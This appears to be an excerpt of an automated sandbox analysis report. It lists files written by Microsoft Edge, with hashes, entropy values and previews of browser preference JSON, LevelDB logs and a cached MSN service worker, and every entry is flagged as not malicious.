                                                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380108386242373","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):13853
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.239503772870446
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:stVJ99QTryDigabatSuypSswfsZihUkA6OYGFiN8bbV+F0sQwj66W9aFIMYLPiYJ:stVPGKSu4SswffhAbGJQwO6W9aTYX
                                                                                                                                                                                                                                                                                                                                    MD5:FF16F73C270C2BEED3545B32AF911E92
                                                                                                                                                                                                                                                                                                                                    SHA1:0E1B009F0B4BCAAD462DFC2FFAA0674A5DEE673B
                                                                                                                                                                                                                                                                                                                                    SHA-256:E3E0F1E1CAAC5CAB9A06AB03CEBF970B3EC41D2604B127B184F464A651F21B6A
                                                                                                                                                                                                                                                                                                                                    SHA-512:A2AB52225ACB3D998DAF613FD24B9E5F9BAD626A4D9EB9A0A87D786BC5BCC0C85C84758EA8537CDEB43395240864D22813778CB7863ECD4CAA78C0EAABE66E23
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380108386242373","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):37149
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.564201977667508
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:hpcE8wqhWPd5f/Y8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPPZAXovFrwQO+MsqKpog:hpxTqhWPd5f/Yu1jaORA4vuQO+4ptu
                                                                                                                                                                                                                                                                                                                                    MD5:E9DBCA0C337342CC9FD4AB0C3EB8566B
                                                                                                                                                                                                                                                                                                                                    SHA1:626721E60425625647B260783E302EF6EB6E20EB
                                                                                                                                                                                                                                                                                                                                    SHA-256:B82726D5188A6FE3E213B828A39567CA44B24901650F6CD63288F12BF4F34FCD
                                                                                                                                                                                                                                                                                                                                    SHA-512:B52F5E0B61AE8C82165B8A9823C05397EDACC6AD5578A6D77F1E6C64A5D34F2B6072FFF670179AEB959F127333A3C6B3EA1F7E46242418F795B52A40A57D2A45
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380108385675880","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380108385675880","location":5,"ma
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):37149
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.564201977667508
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:hpcE8wqhWPd5f/Y8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPPZAXovFrwQO+MsqKpog:hpxTqhWPd5f/Yu1jaORA4vuQO+4ptu
                                                                                                                                                                                                                                                                                                                                    MD5:E9DBCA0C337342CC9FD4AB0C3EB8566B
                                                                                                                                                                                                                                                                                                                                    SHA1:626721E60425625647B260783E302EF6EB6E20EB
                                                                                                                                                                                                                                                                                                                                    SHA-256:B82726D5188A6FE3E213B828A39567CA44B24901650F6CD63288F12BF4F34FCD
                                                                                                                                                                                                                                                                                                                                    SHA-512:B52F5E0B61AE8C82165B8A9823C05397EDACC6AD5578A6D77F1E6C64A5D34F2B6072FFF670179AEB959F127333A3C6B3EA1F7E46242418F795B52A40A57D2A45
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380108385675880","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380108385675880","location":5,"ma
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2394
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.802086619506487
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:F2xc5NmFcncmoDCRORpllg2hElfRHpldCRORpllg2h6d+eFCRORpllg2hEoRHpT2:F2emmMrd6lfB/rdod+Ird6oBirdWBS
                                                                                                                                                                                                                                                                                                                                    MD5:F4F1519124DF4A5F07D5AC3D651D3317
                                                                                                                                                                                                                                                                                                                                    SHA1:B8F4ECE6875288E244DC260ED4CCB6D7787BAF86
                                                                                                                                                                                                                                                                                                                                    SHA-256:FB399948F9EF0C63C24B420E5FE674A10EB943A8A26C0F4F6504BFCC5D78E5EE
                                                                                                                                                                                                                                                                                                                                    SHA-512:F8800B9866A05EBF123618FA822E59299888E303772A3A25421677C918DB8AC1A4C97631235D6E3F6D871F20022D1D76F987163EE92D808E093EA32550F77946
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2..b..................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):297
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1743267926361645
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56fKWAB1923oH+TcwtE/a252KLlr6fpAq2P923oH+TcwtE/a2ZIFUv:ofKsYeb8xLQfiv4Yeb8J2FUv
                                                                                                                                                                                                                                                                                                                                    MD5:D95D53C032F4D87802BE3BC4EA720A95
                                                                                                                                                                                                                                                                                                                                    SHA1:2956AA1F2F15E23EB61F87E4BE0492F5C90FA69D
                                                                                                                                                                                                                                                                                                                                    SHA-256:F155EFCAD59CA6507CEAA56A5BC7A01136D4F78FA473BDF9F211FE205ED720E8
                                                                                                                                                                                                                                                                                                                                    SHA-512:772F4E53C7B14223200950B2A2B5F93423D51B3AFDC1ABEC75F7B03B3D9D462E955A387C3C4EED89909C33C7B4473CB64089D3CD4691445AF34457B8CCE6A1F1
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:35.212 b80 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/31-03:46:35.316 b80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):114579
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.581081645685965
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ekTA+W:J9LyxPXfOxr1lMe1nL/5L/TXE6n7dM
                                                                                                                                                                                                                                                                                                                                    MD5:47E14BFFD6DB7B16BD3932881563A127
                                                                                                                                                                                                                                                                                                                                    SHA1:E228AEF4369A654218657D00A7433FC708B396B9
                                                                                                                                                                                                                                                                                                                                    SHA-256:4FF0BEA68D71FE04FCD2F220801E75E6F5D07DC2149DCB8EF86605B10C158417
                                                                                                                                                                                                                                                                                                                                    SHA-512:9880E155234666D46E632FBEC0F007BECD8246E2A1A29C1A3BADDDC304B17DDBB435E9D3A56003F8F865C3C73726FA87B8B0FD1ED3E49EAB9ABB1560AD43DBEC
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):189097
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.387663204278043
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:pwJDVHpxkp7wWJ0FoQ4SL/chTBRWJvBjXCK3hdYhTUEIL2:bp7wWYoyL/Yt2jXTqm2
                                                                                                                                                                                                                                                                                                                                    MD5:A45CE9D18885792A34D420A274CC27F6
                                                                                                                                                                                                                                                                                                                                    SHA1:7F9D22ED08D3FF0CA0C98869959CD0E27187E7B8
                                                                                                                                                                                                                                                                                                                                    SHA-256:DA2FC47E5AB7D49334292E53B913A4A7280B2D23A796574C3F7935966A4ADD8E
                                                                                                                                                                                                                                                                                                                                    SHA-512:FAB70FD1A30F33AA351EBD1AC099174F9641956627F9EC3499808023516D548B2834F63127405C1F7002224A78ED9C3333B0433F7C5152D5ABD46C5CB1A7085D
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:0\r..m..........rSG.....0....z3.................;.....x.P........,T.8..`,.....L`.....,T...`......L`......Rc.=.T....exports...Rc........module....Rcro.O....define....Rb.`......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q...b.W.{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....@[...,T.`.`z.....L`..........a............a.........Dr8..............
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                                                    MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                                                    SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                                                    SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                                                    SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:0\r..m..................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:TZrtTXl/lYV/lxEstllQnS:njYWs+S
                                                                                                                                                                                                                                                                                                                                    MD5:89F86AF7D964B33CF05CCAF2B3A5A968
                                                                                                                                                                                                                                                                                                                                    SHA1:6CB090D1E683CF3601B50C7B79EF8941E9FBC41E
                                                                                                                                                                                                                                                                                                                                    SHA-256:2CC9F659C67B1C0A32E79B8A817FE60DE1A51100733BAD13A22B915E74B5CE26
                                                                                                                                                                                                                                                                                                                                    SHA-512:8D99E9E0A2EA1AF7E1B5620E206964BCB5DA953E80BAA769CE8F10804FFD0EED7EF64AA1638ACC27F7F27D4C76BB6CA8E8A52D7261B5C966D68D9C4E0CBFD8FB
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:@...&.B.oy retne.........................X....,................p5.@#./.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:TZrtTXl/lYV/lxEstllQnS:njYWs+S
                                                                                                                                                                                                                                                                                                                                    MD5:89F86AF7D964B33CF05CCAF2B3A5A968
                                                                                                                                                                                                                                                                                                                                    SHA1:6CB090D1E683CF3601B50C7B79EF8941E9FBC41E
                                                                                                                                                                                                                                                                                                                                    SHA-256:2CC9F659C67B1C0A32E79B8A817FE60DE1A51100733BAD13A22B915E74B5CE26
                                                                                                                                                                                                                                                                                                                                    SHA-512:8D99E9E0A2EA1AF7E1B5620E206964BCB5DA953E80BAA769CE8F10804FFD0EED7EF64AA1638ACC27F7F27D4C76BB6CA8E8A52D7261B5C966D68D9C4E0CBFD8FB
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:@...&.B.oy retne.........................X....,................p5.@#./.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:TZrtTXl/lYV/lxEstllQnS:njYWs+S
                                                                                                                                                                                                                                                                                                                                    MD5:89F86AF7D964B33CF05CCAF2B3A5A968
                                                                                                                                                                                                                                                                                                                                    SHA1:6CB090D1E683CF3601B50C7B79EF8941E9FBC41E
                                                                                                                                                                                                                                                                                                                                    SHA-256:2CC9F659C67B1C0A32E79B8A817FE60DE1A51100733BAD13A22B915E74B5CE26
                                                                                                                                                                                                                                                                                                                                    SHA-512:8D99E9E0A2EA1AF7E1B5620E206964BCB5DA953E80BAA769CE8F10804FFD0EED7EF64AA1638ACC27F7F27D4C76BB6CA8E8A52D7261B5C966D68D9C4E0CBFD8FB
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:@...&.B.oy retne.........................X....,................p5.@#./.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):6147
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.389207588013864
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:fY0wgJ19Xp+o4gpX+DfLl9iSr/pqaspxzk:A0L9Xp+CCLl9iSrxXspxzk
                                                                                                                                                                                                                                                                                                                                    MD5:313F996EE7ECEA8B00AF5CA3F9C9191D
                                                                                                                                                                                                                                                                                                                                    SHA1:941F4D4B028A81E3491602B32EFA142BCBA2647C
                                                                                                                                                                                                                                                                                                                                    SHA-256:601FA17C508DA0F0E2F59987361386150E5CD3AC7D85D4EB9EBF198519C69C99
                                                                                                                                                                                                                                                                                                                                    SHA-512:71150F91E47DAA8BA55BED3B613BB3690B02E745DC46F9648C28658B5E7D016B7C6EF2801B92EDE8FC44FE60FF4C3367F83EC10CEC2E961C9476E9C798B4878D
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...................b................next-map-id.1.Cnamespace-31aa394c_1ba2_4531_83a6_7b33440ae671-https://ntp.msn.com/.0.|(.................map-0-shd_sweeper.-{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.e.s.h.b.t.n.t.r.t.f.a.c.,.c.-.p.r.g.-.m.s.n.-.s.b.i.d.m.,.p.n.p.w.x.e.x.p.i.r.e.-.c.,.b.i.n.g._.v.2._.s.c.o.p.e.-.c.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.1.s.-.p.2.-.i.g.n.o.r.e.c.m.,.1.s.-.f.c.r.y.p.t.,.1.s.-.n.t.f.2.-.e.v.l.c.f.c.,.1.s.-.n.t.f.2.-.b.k.n.l.c.,.1.s.-.n.t.f.2.-.i.p.t.l.c.,.1.s.-.p.r.2.-.e.v.l.c.,.1.s.-.p.r.2.-.e.v.l.c.b.b.,.1.s.-.p.r.2.-.e.v.l.c.h.,.1.s.-.p.r.2.-.e.v.l.c.n.,.1.s.-.p.r.2.-.e.v.l.c.r.p.,.1.s.-.p.r.2.-.e.v.l.c.t.,.1.s.-.p.r.g.2.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.155406525785384
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f9ZQL+q2P923oH+TcwtrQMxIFUt8M6f9jiG1Zmw+M6f9BiQLVkwO923oH+TcwJ:of7Q+v4YebCFUt8xfYG1/+xfLiQV5LYM
                                                                                                                                                                                                                                                                                                                                    MD5:8D21DAC1106A6F00BE416D6F553E3903
                                                                                                                                                                                                                                                                                                                                    SHA1:1DADDE4CB0644C812EC7985A5BEBCE7F3B192127
                                                                                                                                                                                                                                                                                                                                    SHA-256:7A8EBC3BE345D8A78012FEA6AD5B35102526073CF9087D29AB09E6F6475CEDA0
                                                                                                                                                                                                                                                                                                                                    SHA-512:785FDDF47E18F3A25BCC8E99D91C6E93D07C86230E63B64293624F2E76CCDD4F377081C57A30468E4E765242F1591E8DA7AE20203BEAF1E7C369091102B14E27
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:26.489 119c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/31-03:46:26.491 119c Recovering log #3.2024/12/31-03:46:26.497 119c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
